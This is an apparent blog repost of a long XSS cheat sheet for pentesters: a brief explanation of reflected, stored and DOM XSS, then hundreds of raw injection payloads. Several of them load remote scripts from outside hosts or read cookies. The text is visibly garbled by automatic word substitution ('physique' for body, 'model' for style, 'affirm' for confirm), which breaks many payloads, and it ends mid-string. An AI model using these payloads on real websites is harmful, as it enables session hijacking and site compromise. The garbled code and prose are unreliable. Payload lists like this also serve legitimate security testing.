July 2, 2022

XSS is a really generally exploited vulnerability kind which may be very broadly unfold and simply detectable. Right here we’re going to see about most essential XSS Cheat Sheet.

What’s XSS(Cross Web site Scripting)? An attacker can inject untrusted snippets of JavaScript into your software with out validation. This JavaScript is then executed by the sufferer who’s visiting the goal web site. XSS labeled into three sorts and these XSS Cheat Sheet will assist to seek out the XSS vulnerabilities for Pentesters.

 

XSS Cheat Sheet
  • In Mirrored XSS, an attacker sends the sufferer a hyperlink to the goal software by e-mail, social media, and many others. This hyperlink has a script embedded inside it which executes when visiting the goal web site.
  • In Saved XSS, the attacker is ready to plant a persistent script within the goal web site which is able to execute when anybody visits it.
  • With DOM Based mostly XSS, no HTTP request is required, the script is injected because of modifying the DOM of the goal web site within the consumer aspect code within the sufferer’s browser and is then executed.

You’ll be able to Additionally Be taught Superior Net Hacking & Penetration Testing Course – Scratch to Advance.

Most Essential XSS Cheat Sheet

EHA
<physique oninput=javascript:alert(1)><enter autofocus>
<math href="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<desk background="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<remark><img src="</remark><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<model><img src="</model><img src=x onerror=javascript:alert(1)//">
<li model=list-style:url() onerror=javascript:alert(1)> <div model=content material:url(information:picture/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><physique><a href="/. /,javascript:alert(1)//#">XXX</a></physique>
<SCRIPT FOR=doc EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object information="information:textual content/html;base64,%(base64)s">
<embed src="information:textual content/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><enter worth="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>doc.getElementById("div2").innerHTML = doc.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<picture src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div model=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>
<img x00src=x onerror="alert(1)">
<img x47src=x onerror="javascript:alert(1)">
<img x11src=x onerror="javascript:alert(1)">
<img x12src=x onerror="javascript:alert(1)">
<imgx47src=x onerror="javascript:alert(1)">
<imgx10src=x onerror="javascript:alert(1)">
<imgx13src=x onerror="javascript:alert(1)">
<imgx32src=x onerror="javascript:alert(1)">
<imgx47src=x onerror="javascript:alert(1)">
<imgx11src=x onerror="javascript:alert(1)">
<img x47src=x onerror="javascript:alert(1)">
<img x34src=x onerror="javascript:alert(1)">
<img x39src=x onerror="javascript:alert(1)">
<img x00src=x onerror="javascript:alert(1)">
<img srcx09=x onerror="javascript:alert(1)">
<img srcx10=x onerror="javascript:alert(1)">
<img srcx13=x onerror="javascript:alert(1)">
<img srcx32=x onerror="javascript:alert(1)">
<img srcx12=x onerror="javascript:alert(1)">
<img srcx11=x onerror="javascript:alert(1)">
<img srcx00=x onerror="javascript:alert(1)">
<img srcx47=x onerror="javascript:alert(1)">
<img src=xx09onerror="javascript:alert(1)">
<img src=xx10onerror="javascript:alert(1)">
<img src=xx11onerror="javascript:alert(1)">
<img src=xx12onerror="javascript:alert(1)">
<img src=xx13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=x09"javascript:alert(1)">
<img src=x onerror=x10"javascript:alert(1)">
<img src=x onerror=x11"javascript:alert(1)">
<img src=x onerror=x12"javascript:alert(1)">
<img src=x onerror=x32"javascript:alert(1)">
<img src=x onerror=x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/%(jscript)s"></script>
<script src="%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" model="habits:url(#x);"><param title=postdomevents /></object>
<a mode="-o-link:"https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)";-o-link-source:present">X
<model>p[foo=bar{}*{-o-link:"https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)"}{}*{-o-link-source:current}]{shade:purple};</model>
<hyperlink rel=stylesheet href=information:,*%7bx:expression(javascript:alert(1))%7d
<model>@import "information:,*%7bx:expression(javascript:alert(1))%7D";</model>
<a mode="pointer-events:none;place:absolute;"><a mode="place:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:javascript:alert(1)">XXX</a>
<model>*[{}@import'%(css)s?]</model>X
<div model="font-family:'foo&#10;;shade:purple;';">XXX
<div model="font-family:foo}shade=purple;">XXX
<// model=x:expression28javascript:alert(1)29>
<model>*{x:expression(javascript:alert(1))}</model>
<div model=content material:url(%(svg)s)></div>
<div model="list-style:url(http://foo.f)20url(javascript:javascript:alert(1));">X
<div id=d><div model="font-family:'sans273B color3Ared3B'">X</div></div> <script>with(doc.getElementById("d"))innerHTML=innerHTML</script>
<div model="background:url(/f#&#127;oo/;shade:purple/*/foo.jpg);">X
<div model="font-family:foo{bar;background:url(http://foo.f/oo};shade:purple/*/foo.jpg);">X
<div id="x">XXX</div> <model> #x{font-family:foo[bar;color:green;} #y];shade:purple;{} </model>
<x model="background:url('x&#1;;shade:purple;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('title', perform(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Perform,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x model=`habits:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` model=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;[email protected][/|]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');">
<BODY BACKGROUND="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<IMG DYNSRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<IMG LOWSRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<STYLE>li {list-style-image: url("https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Hyperlink" Content material="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='noxss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="textual content/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE kind="textual content/css">BODY{background:url("https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')")}</STYLE>
<STYLE kind="textual content/css">BODY{background:url("https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="habits: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=information:textual content/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(doc.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');"></FRAMESET>
<TABLE BACKGROUND="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<TABLE><TD BACKGROUND="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');//">
 <OBJECT TYPE="textual content/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="information:picture/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" kind="picture/svg+xml" AllowScriptAccess="all the time"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content material="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
 <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="textual content/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a=">"" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>doc.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77percent77percent77percent2Epercent67percent6Fpercent6Fpercent67percent6Cpercent65percent2Epercent63percent6Fpercent6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src="&Tab;javascript:immediate(1)&Tab;">
<svg><model>{font-family&colon;'<iframe/onload=affirm(1)>'
<enter/onmouseover="javaSCRIPT&colon;affirm&lpar;1&rpar;"
<sVg><scRipt >alert&lpar;1&rpar; {Opera}
<img/src=`` onerror=this.onerror=affirm(1) 
<kind><isindex formaction="javascript&colon;affirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;
<script/&Tab; src="https://dl.dropbox.com/u/13018058/js.js" /&Tab;></script>
<ScRipT 5-0*3+9/3=>immediate(1)</ScRipT giveanswerhere=?
<iframe/src="information:textual content/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /**/>/**/alert(1)/**/</script /**/
&#34;&#62;<h1/onmouseover="u0061lert(1)">
<iframe/src="information:textual content/html,<svg &#111;&#110;load=alert(1)>">
<meta content material="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=information&colon;,window.open('https://www.google.com/')></script
<svg><script x:href="https://dl.dropbox.com/u/13018058/js.js" {Opera}
<meta http-equiv="refresh" content material="0;url=javascript:affirm(1)">
<iframe src=javascript&colon;alert&lpar;doc&interval;location&rpar;>
<kind><a href="javascript:u0061lert&#x28;1&#x29;">X
</script><img/*/src="worksinchrome&colon;immediate&#x28;1&#x29;"/*/onerror="eval(src)">
<img/&#09;&#10;&#11; src=`~` onerror=immediate(1)>
<kind><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<a href="information:software/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
http://www.google<script .com>alert(doc.location)</script
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=immediate&#40;1&#41;&#47;&#47;">XYZ</a
<img/[email protected]&#32;&#13; onerror = immediate('&#49;')
<model/onload=immediate&#40;'&#88;&#83;&#83;'&#41;
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</model &#32;><script &#32; :-(>/**/alert(doc.location)/**/</script &#32; :-(
&#00;</kind><enter kind&#61;"date" onfocus="alert(1)">
<kind><textarea &#13; onkeyup='u0061u006Cu0065u0072u0074&#x28;1&#x29;'>
<script /***/>/***/affirm('uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450')/***/</script /***/
<iframe srcdoc="&lt;physique onload=immediate&lpar;1&rpar;&gt;">
<a href="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
<script ~~~>alert(0percent0)</script ~~~>
<model/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<///model///><span %2F onmousemove="alert&lpar;1&rpar;">SPAN
<img/src="http://i.imgur.com/P8mL8.jpg" onmouseover=&Tab;immediate(1)
&#34;&#62;<svg><model>{-o-link-source&colon;'<physique/onload=affirm(1)>'
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
<marquee onstart="javascript:alert&#x28;1&#x29;">^__^
<div/model="width:expression(affirm(1))">X</div> {IE7}
<iframe// src=javaSCRIPT&colon;alert(1)
//<kind/motion=javascript&#x3A;alert&lpar;doc&interval;cookie&rpar;><enter/kind="submit">//
/*iframe/src*/<iframe/src="<iframe/[email protected]"/onload=immediate(1) /*iframe/src*/>
//| <script //| src="https://dl.dropbox.com/u/13018058/js.js"> //| </script //|
</font>/<svg><model>{src&#x3A;'<model/onload=this.onload=affirm(1)>'</font>/</model>
<a/href="javascript:&#13; javascript:immediate(1)"><enter kind="X">
</plaintext></|><plaintext/onmouseover=immediate(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
<a href="javascript&colon;u0061&#x6C;&#101percent72t&lpar;1&rpar;"><button>
<div onmouseover="alert&lpar;1&rpar;">DIV</div>
<iframe model="place:absolute;prime:0;left:0;width:100%;peak:100%" onmouseover="immediate(1)">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object information="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="immediate(1)">On Mouse Over</var>
<a href=javascript&colon;alert&lpar;doc&interval;cookie&rpar;>Click on Right here</a>
<img src="/" =_=" title="onerror="immediate(1)"">
<%<!--'%><script>alert(1);</script -->
<script src="information:textual content/javascript,alert(1)"></script>
<iframe/src //onload = immediate(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<enter worth=<><iframe/src=javascript:affirm(1)
<enter kind="textual content" worth=`` <div/onmouseover="alert(1)">X</div>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object kind="textual content/x-scriptlet" information="http://jsfiddle.web/XLE63/ "></object>
<meta http-equiv="refresh" content material="0;javascript&colon;alert(1)"/>
<math><a xlink:href="https://jsfiddle.web/t846h/">click on
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=all the time>
<svg contentScriptType=textual content/vbs><script>MsgBox+1
<a href="information:textual content/html;base64_,<svg/onload=u0061&#x6C;&#101percent72t(1)>">X</a
<iframe/onreadystatechange=u0061u006Cu0065u0072u0074('u0061') worksinIE>
<script>~'u0061' ; u0074u0068u0072u006Fu0077 ~ u0074u0068u0069u0073. u0061u006Cu0065u0072u0074(~'u0061')</script U+
<script/src="information&colon;textpercent2Fju0061vu0061script,u0061lert('u0061')"></script a=u0061 & /=%2F
<script/src=information&colon;textual content/ju0061vu0061&#115&#99&#114&#105&#112&#116,u0061percent6Cpercent65percent72percent74(/XSS/)></script
<object information=javascript&colon;u0061&#x6C;&#101percent72t(1)>
<script>+-+-1-+-+alert(1)</script>
<physique/onload=&lt;!--&gt;&#10alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?/onerror = alert(1)
<svg><script>//&NewLine;affirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover="alert(1)"> model="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=&#100&#97&#116&#97:textual content/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<div model="place:absolute;prime:0;left:0;width:100%;peak:100%" onmouseover="immediate(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<kind><button formaction=javascript&colon;alert(1)>CLICKME
<math><a xlink:href="https://jsfiddle.web/t846h/">click on
<object information=information:textual content/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="information:textual content/html,%3Cpercent73percent63percent72percent69percent70percent74percent3Epercent61percent6Cpercent65percent72percent74percent28percent31percent29percent3Cpercent2Fpercent73percent63percent72percent69percent70percent74percent3E"></iframe>
<a href="information:textual content/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click on Me</a>

'';!--"<XSS>=&{()}
'>//,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script> 
<img src=foo.png onerror=alert(/xssed/) />
<model>@import'javascript:alert("XSS")';</model>
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<IMG DYNSRC="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<font model="shade:expression(alert(doc.cookie))">
<img src="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS')">
<script language="JavaScript">alert('XSS')</script>

<physique onunload="https://gbhackers.com/top-500-important-xss-cheat-sheet/javascript:alert("XSS');">
<physique onLoad="alert('XSS');"

[color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]

See also  Most Necessary Net Server Penetration Testing Guidelines

“/></a></><img src=1.gif onerror=alert(1)>
window.alert(“Bonjour !”);
<div model=”x:expression((window.r==1)?”:eval(‘r=1;
alert(String.fromCharCode(88,83,83));’))”>
<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
“><script alert(String.fromCharCode(88,83,83))</script>
‘>><marquee><h1>XSS</h1></marquee>
‘”>><script>alert(‘XSS’)</script>
‘”>><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=”refresh” CONTENT=”0;url=javascript:alert(‘XSS’);”>
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
<script>var var = 1; alert(var)</script>
<STYLE kind=”textual content/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
<?='<SCRIPT>alert(“XSS”)</SCRIPT>’?>
<IMG SRC=’vbscript:msgbox(”XSS”)’>
” onfocus=alert(doc.area) “> <”
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
<STYLE>li {list-style-image: url(”javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
perl -e ‘print ”<SCRIPT>alert(”XSS”)</SCRIPT>”;’ > out
perl -e ‘print ”<IMG SRC=javascript:alert(”XSS”)>”;’ > out
<br measurement=”&{alert(‘XSS’)}”>
<scrscriptipt>alert(1)</scrscriptipt>
</br model=a:expression(alert())>
</script><script>alert(1)</script>
“><BODY onload!#$%&()*~+-_.,:;[email protected][/|]^`=alert(“XSS”)>

[color=red width=expression(alert(123))]

[color]
<BASE HREF=”javascript:alert(‘XSS’);//”>
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
“></iframe><script>alert(123)</script>
<physique onLoad=”whereas(true) alert(‘XSS’);”>
‘”></title><script>alert(1111)</script>
</textarea>’”><script>alert(doc.cookie)</script>
‘””><script language=”JavaScript”> alert(‘X nS nS’);</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
‘></choose><script>alert(123)</script>
‘>”><script src = ‘http://www.web site.com/XSS.js’></script>
}</model><script>a=eval;b=alert;a(b(/XSS/.supply));</script>
<SCRIPT>doc.write(“XSS”);</SCRIPT>
a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
=’><script>alert(“xss”)</script>
<script+src=”>”+src=”http://yoursite.com/xss.js?69,69″></script>
<physique background=javascript:’”><script>alert(navigator.userAgent)</script>></physique>
“>/XaDoS/><script>alert(doc.cookie)</script><script src=”http://www.web site.com/XSS.js”></script>
“>/KinG-InFeT.NeT/><script>alert(doc.cookie)</script>
src=”http://www.web site.com/XSS.js”></script>
information:textual content/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!–” /><script>alert(‘xss’);</script>
<script>alert(“XSS by nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
“><script>alert(“XSS by nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
‘”></title><script>alert(“XSS by nxss”)</script>><marquee><h1>XSS by xss</h1></marquee>
<img “””><script>alert(“XSS by nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
“><script>alert(1337)</script>”><script>alert(“XSS by nxss</h1></marquee>
‘”></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src=”javascript:alert(‘XSS by nxss’);”></iframe><marquee><h1>XSS by xss</h1></marquee>
‘><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
“><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=”
’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=”” alt=’
http://www.simpatie.ro/index.php?web page=mates&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?web page=top_movies&cat=13&p=2 p=2 ??XSS??
‘); alert(‘xss’); var x=’
’); alert(’xss’);var x=’
//–></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
>”><ScRiPtpercent20percent0apercent0d>alert(561177485777)%3B</ScRiPt>
<img src=”Mario Heiderich says that svg SHOULD not be executed trough picture tags” onerror=”javascript:doc.write(‘u003cu0069u0066u0072u0061u006du0065u0020u0073u0072u0063u003du0022u0064u0061u0074u0061u003au0069u006du0061u0067u0065u002fu0073u0076u0067u002bu0078u006du006cu003bu0062u0061u0073u0065u0036u0034u002cu0050u0048u004eu0032u005au0079u0042u0034u0062u0057u0078u0075u0063u007au0030u0069u0061u0048u0052u0030u0063u0044u006fu0076u004cu0033u0064u0033u0064u0079u0035u0033u004du0079u0035u0076u0063u006du0063u0076u004du006au0041u0077u004du0043u0039u007au0064u006du0063u0069u0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u0070u0062u0057u0046u006eu005au0053u0042u0076u0062u006du0078u0076u0059u0057u0051u0039u0049u006du0046u0073u005au0058u004au0030u004bu0044u0045u0070u0049u006au0034u0038u004cu0032u006cu0074u0059u0057u0064u006cu0050u0069u0041u0067u0043u0069u0041u0067u0049u0044u0078u007au0064u006du0063u0067u0062u0032u0035u0073u0062u0032u0046u006bu0050u0053u004au0068u0062u0047u0056u0079u0064u0043u0067u0079u004bu0053u0049u002bu0050u0043u0039u007au0064u006du0063u002bu0049u